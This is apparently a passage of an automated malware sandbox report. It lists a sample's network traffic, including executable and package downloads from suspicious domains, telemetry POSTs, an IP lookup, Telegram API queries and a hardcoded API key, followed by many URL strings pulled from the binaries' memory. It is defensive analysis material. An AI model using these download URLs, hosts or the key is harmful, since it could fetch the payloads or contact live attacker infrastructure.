    Source: global traffic | HTTP traffic detected: GET /tools/files/f86d096d-ce60-4b6e-ac60-096d2250693a/ClubShipper.exe HTTP/1.1 | Host: boldvertex.store
    Source: global traffic | HTTP traffic detected: POST /logs/telemetry HTTP/1.1 | Host: swiftvantage.online | Content-Type: application/json | Content-Length: 1296
    Source: global traffic | HTTP traffic detected: POST /logs/telemetry HTTP/1.1 | Host: swiftvantage.online | Content-Type: application/json | Content-Length: 114
    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: ifconfig.me | Accept: */*
    Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
    Source: Joe Sandbox View | IP Address: 104.21.16.1 104.21.16.1
    Source: Joe Sandbox View | IP Address: 104.21.16.1 104.21.16.1
    Source: Joe Sandbox View | IP Address: 34.160.111.145 34.160.111.145
    Source: Joe Sandbox View | JA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
    Source: Joe Sandbox View | JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
    Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: unknown | DNS query: name: ifconfig.me
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic | HTTP traffic detected: GET /tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Install.exe HTTP/1.1 | Accept: */* | User-Agent: AdvancedInstaller | Host: swiftvantage.online | Connection: Keep-Alive | Cache-Control: no-cache
    Source: global traffic | HTTP traffic detected: GET /tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Surfclub.pkg HTTP/1.1 | Accept: */* | User-Agent: AdvancedInstaller | Host: swiftvantage.online | Connection: Keep-Alive | Cache-Control: no-cache
    Source: global traffic | HTTP traffic detected: GET /install/whattoinstall/3a9ad13f-de6d-43be-b899-593fefcb45ef HTTP/1.1 | Host: jonatechlab.com | X-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global traffic | HTTP traffic detected: GET /install/getfiles/Chop/Install.exe HTTP/1.1 | Host: jonatechlab.com | X-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global traffic | HTTP traffic detected: GET /install/getfiles/Chop/Chop.pkg HTTP/1.1 | Host: jonatechlab.com | X-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global traffic | HTTP traffic detected: GET /v.php HTTP/1.1 | Host: wetransfers.io | User-Agent: curl/7.83.1 | Accept: */*
    Source: global traffic | HTTP traffic detected: GET /tools/domains HTTP/1.1 | Host: swiftvantage.online
    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: boldvertex.store
    Source: global traffic | HTTP traffic detected: GET /tools/config/installer/f86d096d-ce60-4b6e-ac60-096d2250693a HTTP/1.1 | Host: boldvertex.store
    Source: global traffic | HTTP traffic detected: GET /tools/files-to-delete/f86d096d-ce60-4b6e-ac60-096d2250693a HTTP/1.1 | Host: boldvertex.store
    Source: global traffic | HTTP traffic detected: GET /tools/files/f86d096d-ce60-4b6e-ac60-096d2250693a/ClubShipper.exe HTTP/1.1 | Host: boldvertex.store
    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: ifconfig.me | Accept: */*
    Source: global traffic | DNS traffic detected: DNS query: swiftvantage.online
    Source: global traffic | DNS traffic detected: DNS query: jonatechlab.com
    Source: global traffic | DNS traffic detected: DNS query: wetransfers.io
    Source: global traffic | DNS traffic detected: DNS query: ifconfig.me
    Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
    Source: global traffic | DNS traffic detected: DNS query: boldvertex.store
    Source: unknown | HTTP traffic detected: POST /install/new HTTP/1.1 | Host: jonatechlab.com | X-API-Key: 123e4567-e89b-12d3-a456-426614174000 | Transfer-Encoding: chunked | Content-Type: application/json; charset=utf-8
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2489752761.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000009.00000000.2402662552.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://.css
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2489752761.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000009.00000000.2402662552.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://.jpg
    Source: 1.exe, 00000000.00000003.2546181506.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590336705.00000000084DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cert.ssl.com/SSL.com-t
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2546181506.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590336705.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590533267.000000000A5B0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2545951792.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886321530.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1699505082.0000000008501000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886296929.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1882325597.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2552341866.0000000008AFE000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
    Source: 1.exe, 00000000.00000003.2546181506.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590336705.00000000084DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crls.ssl.co
    Source: 1.exe, 00000004.00000003.1886222361.0000000008B07000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crls.ssl.com/
    Source: 1.exe, 00000000.00000002.2590533267.000000000A5B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2546181506.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590336705.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2545951792.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886321530.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
    Source: 1.exe, 00000000.00000002.2589385517.0000000008450000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSLcom
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1699505082.0000000008501000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1882325597.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1699505082.0000000008501000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886296929.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1882325597.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2552341866.0000000008AFE000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2546181506.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590336705.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2545951792.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886321530.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2489752761.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000009.00000000.2402662552.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://html4/loose.dtd
    Source: MainSoftware.exe, 00000009.00000002.2454127361.000002099848E000.00000004.00001000.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2454127361.0000020998475000.00000004.00001000.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2454127361.0000020998449000.00000004.00001000.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2454127361.00000209984A3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://jonatechlab.com:443/
    Source: 1.exe, 00000000.00000003.2546181506.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590336705.00000000084DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1699505082.0000000008501000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886222361.0000000008B07000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1882325597.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2545951792.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886321530.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0?
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2546181506.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590336705.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1699505082.0000000008501000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886296929.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1882325597.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2552341866.0000000008AFE000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0P
    Source: MainSoftware.exe, 00000009.00000002.2457473544.0000024A2D240000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.IO
    Source: MainSoftware.exe, 00000009.00000002.2457473544.0000024A2D240000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemV
    Source: MainSoftware.exe, 00000009.00000002.2457473544.0000024A2D240000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemY
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
    Source: 1.exe, 00000000.00000003.1953629935.000000000CC6C000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2471636608.0000024A30491000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2471927266.0000024A304B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488653015.0000021DEA2F1000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
    Source: 1.exe, 00000000.00000003.1953629935.000000000CC6C000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2471636608.0000024A30491000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2471927266.0000024A304B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488653015.0000021DEA2F1000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
    Source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamevhttp://schemas.xmlsoap.o
    Source: 1.exe, 00000000.00000003.2546181506.00000000084DF000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.2590336705.00000000084DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/
    Source: 1.exe, 00000004.00000002.2547718570.0000000004F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/repo
    Source: 1.exe, 00000000.00000002.2589385517.0000000008450000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/repository/S%wz
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1699505082.0000000008501000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1882325597.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547718570.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1885809203.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2545951792.0000000004FFB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886321530.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2547608379.0000000004F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
    Source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
    Source: 1.exe, 00000000.00000003.1953629935.000000000C986000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmp, Install.exeString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
    Source: 1.exe, 00000000.00000003.1953629935.000000000C986000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.1953629935.000000000C7F4000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A9D3000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/binaryformatter
    Source: MainSoftware.exe, 00000009.00000000.2402662552.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?
    Source: 1.exe, 00000000.00000003.1953629935.000000000C986000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A9D3000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/com
    Source: 1.exe, 00000000.00000003.1953629935.000000000C986000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/com)
    Source: 1.exe, 00000000.00000003.1953629935.000000000C986000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A9D3000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehost
    Source: MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A9D3000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehostt
    Source: MainSoftware.exe, 0000000E.00000002.2486216479.0000021DE9F91000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488653015.0000021DEA2F1000.00000002.00000001.00040000.0000000A.sdmp, Install.exeString found in binary or memory: https://aka.ms/dotnet-warnings/
    Source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2489752761.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000009.00000000.2402662552.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
